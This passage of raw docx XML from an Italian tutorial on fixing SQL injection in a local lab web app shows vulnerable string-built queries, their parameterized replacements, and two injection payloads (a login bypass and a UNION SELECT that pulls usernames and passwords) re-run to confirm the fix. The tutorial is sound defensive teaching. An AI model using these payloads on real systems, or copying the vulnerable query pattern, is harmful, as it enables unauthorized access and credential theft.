        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND password='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password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f"[DEBUG] Query eseguita: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cur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> conn.cursor()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(query)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    riga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sostituiscila con:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ SICURO — query parametrizzata</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT id, username, ruolo FROM utenti WHERE username=? AND password=?"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"[DEBUG] Query template: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f"[DEBUG] Parametri:      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(username, password)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserv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cur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> conn.cursor()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(query, (username, password))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    riga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Allo stesso modo, modifica la funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cerca()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Trova:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ❌ VULNERABILE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"SELECT nome, descrizione FROM prodotti WHERE nome LIKE '%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%'"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"[DEBUG] Query eseguita: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cur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> conn.cursor()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sostituiscila con:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ SICURO — query parametrizzata</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT nome, descrizione FROM prodotti WHERE nome LIKE ?"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">parametro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q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"[DEBUG] Query template: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f"[DEBUG] Parametro:      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">parametro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</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cur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> conn.cursor()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(query, (parametro,))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sottigliezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: nella ricerca, i caratteri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(jolly del LIKE) restano nel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">parametro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non nella stringa SQL. Il database li interpreta come jolly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dentro il valore del parametro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, ma il parametro stesso non può contenere comandi. Questa distinzione fa tutta la differenza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Salva, riavvia l’app (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per fermare, poi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="224"/>
    <w:bookmarkStart w:id="225" w:name="verifica"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riprova gli stessi attacchi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Login bypass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, scrivi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin' --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come username e qualsiasi password. Risultato:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Credenziali errate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non funziona più</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1094"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: vai su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/cerca?q=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT username, password FROM utenti --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Risultato: vedi una pagina con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nessun risultato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o con la stringa cercata letteralmente come testo, non eseguita.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Stop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai protetto entrambi gli endpoint con due righe di codice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="225"/>
    <w:bookmarkEnd w:id="226"/>
    <w:bookmarkStart w:id="228" w:name="cosa-fanno-davvero-i-dietro-le-quinte"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="503" w:name="sec_5_8"/>
      <w:r>
        <w:t xml:space="preserve">5.8 Cosa fanno davvero i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: dietro le quinte</w:t>
      </w:r>
      <w:bookmarkEnd w:id="503"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso la spiegazione del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">perché</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">funzionano. Capirla serve a non commettere l’errore di pensare che siano una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sostituzione testuale automatica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(che non sarebbe diversa dalla concatenazione manuale).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando esegui</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute("SELECT ... WHERE x=?", (valore,))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non costruisce una stringa SQL completa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esegue questi due passi distinti:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Preparazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">prepare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Il database riceve la query con i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">la analizza sintatticamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(parsing),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">la compila</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in un piano di esecuzione, e tiene traccia di dove sono i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">buchi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da riempire.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">A questo punto la struttura della query è già fissata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il database sa esattamente quali tabelle, quali colonne, quali condizioni. I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sono solo segnaposto per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Binding dei parametri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(in inglese:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">bind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Il database riceve i valori e li infila nei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come valori binari, mai interpretandoli come SQL. Anche se il valore contiene apici, parole chiave SQL, commenti, qualsiasi cosa, il database lo tratta come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dato puro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In altre parole: con la concatenazione (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">f"... WHERE x='{valore}'"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), la struttura della query e i dati sono indistinguibili — sono tutto testo, e l’utente può infilare struttura nei dati. Con i parametri,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">struttura e dati viaggiano in canali separati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(struttura prima, dati dopo), e l’utente non può mai cambiare la struttura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
